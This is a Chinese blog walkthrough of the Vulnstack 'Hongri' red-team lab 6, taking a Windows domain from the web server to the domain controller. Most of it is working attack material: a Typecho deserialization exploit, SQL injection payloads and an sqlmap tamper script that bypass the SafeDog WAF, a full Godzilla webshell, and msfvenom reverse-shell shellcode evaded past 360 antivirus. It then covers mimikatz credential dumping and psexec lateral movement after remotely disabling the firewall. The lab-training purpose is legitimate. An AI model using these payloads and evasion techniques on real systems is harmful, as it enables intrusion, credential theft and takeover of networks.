- 1Vulnstack----1、ATT&CK红队评估实战靶场一_vulnstack靶场
- 2对于mp4 ios和mac safari不能播放问题处理
- 3【Android】 android suspend/resume总结(1)
- 4Unity如何使用手机进行调试(真机)_unity 真机调试
- 5自行搭建 Bitwarden 服务_服务器自建bitwarden
- 6理解Flink算子链
- 7微信小程序修改svg颜色_小程序 svg 颜色
- 8循环神经网络在自动翻译中的成果与未来
- 9关于 Linux Polkit 权限提升漏洞(CVE-2021-4034)的修复方法_poikit高危修复
- 10jmeter接口测试教程及接口测试流程_jmeter接口压测流程详解
ATT&CK靶场系列(六)_红日靶场6
赞
踩
一、环境配置
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/
emmm,我得吐槽一下这个靶场是我配置最久的靶场,主要是自己比较菜,研究了一下午得出结论,可能不太对劲大佬们勿喷
首先是WEB它有3个快照分别对应的是iis、weblogic、typechoCMS,至于网上大佬搞出来的bluecms v1.6 sp1没找到,呜呜呜呜
接着是linux就开放了一个22端口,服务嘛啥也没有,最后DC就没啥好说的
于是就有了我以下搭建思路
V3.2
web\de1ay | 1qaz!QAZ1qaz!QAZ
de1ay\de2ay | 1qaz@WSX!QAZ2wsx
- 1
- 2
- 3
二、外网打点
出我的nmap开干对192.168.111.128 进行扫描
nmap -sV -p 192.168.111.128
- 1
有个80Apache网站服务和一个3306mysql数据库服务
通过目录扫描得出两个网站地址如下:
bluecms:http://192.168.111.128/bluecms_v1.6_sp1/index.php
Typechocms:http://192.168.111.128/build/index.php
- 1
- 2
Typechocms前台反序列化
这里就不复现了参考:https://www.cnblogs.com/zhaijiahui/p/7763804.html
exp:
<?php class Typecho_Request { private $_params = array('screenName'=>'eval(\'phpinfo();exit();\')'); private $_filter = array('assert'); } $payload1 = new Typecho_Request(); class Typecho_Feed { private $_type = 'RSS 2.0'; private $_items; public function __construct($x1) { $this->_items[] = array('author'=>$x1); } } $payload2 = new Typecho_Feed($payload1); $exp['adapter'] = $payload2; $exp['prefix'] = 'c1tas'; echo base64_encode(serialize($exp)); ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
用post提交数据
url:http://192.168.198.128/Typecho1.0/install.php?finish=
Postdata:__typecho_config=前面脚本生成的
Referrer:http://192.168.198.128/Typecho1.0/
bluecms代码审计
直接快捷键 ctrl+shift+F
接着我们定位变量进行代码审计
分析得出这里接受一个get传参赋值给了变量$ad_id,如果满足正确的条件则执行sql语句:
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
- 1
接着继续定位getone()这个自定义函数
可以看到它自定义的一些操作数据库的函数,接着我们审计得出:
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
ad_js.php?ad_id=1 //可控存在sql注入
- 1
- 2
手工绕过某安全Dog
有waf那么fuzz下加上/"%!* 来干扰,绕过order by
ad_js.php?ad_id=1/*§§*/order/*§§*/by/*§§*/6
- 1
ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7
URL编码
ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/7 //正常
ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8 //错误
- 1
- 2
- 3
- 4
绕过union select
内联注释是MySQL为了保持与其他数据兼容,将MySQL中特有的语句放在/!.../中,这些语句在不兼容的数据库中不执行,而在MySQL自身却能识别,执行。/*!50001*/ 在数据库版本大于5.00.00时中间的语句会被执行,此处的50001表示假如。
加上/!50001/ 跑一波
ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,7
- 1
获取当前表:正常语句:
union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()
- 1
套用上面的语句
ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,1,2,3,4,5,6,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
- 1
发现不用database()就不会被拦截
fuzz一下,%0A换行+注释
ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(%0A /*!50440*/) //%0A换行+注释
- 1
存在blue_admin表,查看该表下的字段
单引号过滤把blue_admin,hex编码下
ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E
- 1
存在admin_name,pwd、获取账密
账号
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
- 1
- 2
密码
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
- 1
- 2
接着MD5解出密码去登后台
脚本绕过某安全Dog
github地址:https://github.com/pureqh/bypasswaf
脚本如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26) See the file 'LICENSE' for copying permission Author:pureqh.top """ import re import os from lib.core.data import kb from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS __priority__ = PRIORITY.LOW def dependencies(): singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): payload=payload.replace(" "," ",1) payload=payload.replace("ORDER BY","REGEXP \"[...%25%23]\" /*!11444order %0a by*/") payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/") payload=payload.replace(" AND","/*!11444AND*/") payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE") payload=payload.replace("UNION SELECT","/*!11444union*/ /*REGEXP \"[...%25%23]\"*/ %0a select /*REGEXP \"[...%25%23]\"*/") payload=payload.replace("UNION ALL SELECT","REGEXP \"[...%0a%23]\" /*!11444union %0a select */ ") payload=payload.replace("()","(%0a /*!80000aaa*/)") payload=payload.replace(" AS","/*!11444AS*/") payload=payload.replace("FROM","/*!11444FROM*/") payload=payload.replace("INFORMATION_SCHEMA","/*like\"%0a%23\"*/ %0a INFORMATION_SCHEMA") payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/") return payload
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
python .\sqlmap.py -u "http://192.168.111.128/bluecms_v1.6_sp1/ad_js.php?ad_id=1*" --tamper "safedog_sql_tamper.py" –random-agent --dbms=mysql --level 5
- 1
后台Getshell
用账号admin、密码123456去登陆后台
在模板管理处编辑抓包,尝试跨越目录去读取文件,结果能~
那么放包之后修改文件就能getshell
哥斯拉shell <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='pass'; $payloadName='payload'; $key='3c6e0b8a9c15224a'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
好家伙!!!哥斯拉的shell也给我拦截了
大佬的免杀shell
<?php
$a = strtr('azxcvt','zxcv','sser');
@$a($_POST['password']);
?>
- 1
- 2
- 3
- 4
- 5
在连接蚁剑的时候,编码器不要用base64勾选chr或chr16
这里目标机器安装了某60执行命令就没有回显
绕过某60安全
这里由于虚拟终端被拦截了,只好换成webshell去执行system命令
不得不说某60是真的强嗷
推荐一个项目:https://codeload.github.com/NyDubh3/CuiRi/zip/refs/tags/v1.0
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.129 LPORT=6666 -f c > /root/sheelcode.c
- 1
.\cuiri.exe -f .\msf.txt
- 1
生成完事之后直接上传到360进行执行
查看进程可以看到某60和safedog
先迁移进程
getpid
migrate 2168
- 1
- 2
三、内网渗透
msf传递shell给CS
CS建立监听器
bg //退出保留会话
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129 //注意这是CS的地址
set session 1
set lport 7777
run
- 1
- 2
- 3
- 4
- 5
- 6
- 7
Run mimikatz
logonpasswords
- 1
Username : de1ay
Domain : WEB
Password : 1qaz!QAZ1qaz!QAZ
- 1
- 2
- 3
横向移动
通过网上大哥们的wp得到管理员密码好像是这个人傻了
Administrator
1qaz@WSX1qaz@WSX
- 1
- 2
上线域控DC
关闭防火墙后利用模块上线:
shell
net use \\10.10.10.10\ipc$ "1qaz@WSX1qaz@WSX" /user:"Administrator"
sc \\10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\10.10.10.10 start unablefirewall
- 1
- 2
- 3
- 4
抓取到域管理员的密码了,直接psexec登陆
exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.10
set smbuser administrator
set smbpass 1qaz@WSX1qaz@WSX
- 1
- 2
- 3
- 4
- 5
拿下域控
参考大佬们的博客:
https://www.erikten.cn/posts/f3c9f0b.html
https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247495964&idx=6&sn=23d5a6c9f323c314c6b0ca0dfd8b54b8
https://blog.b1ank.top/posts/6e6989c7/
本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。
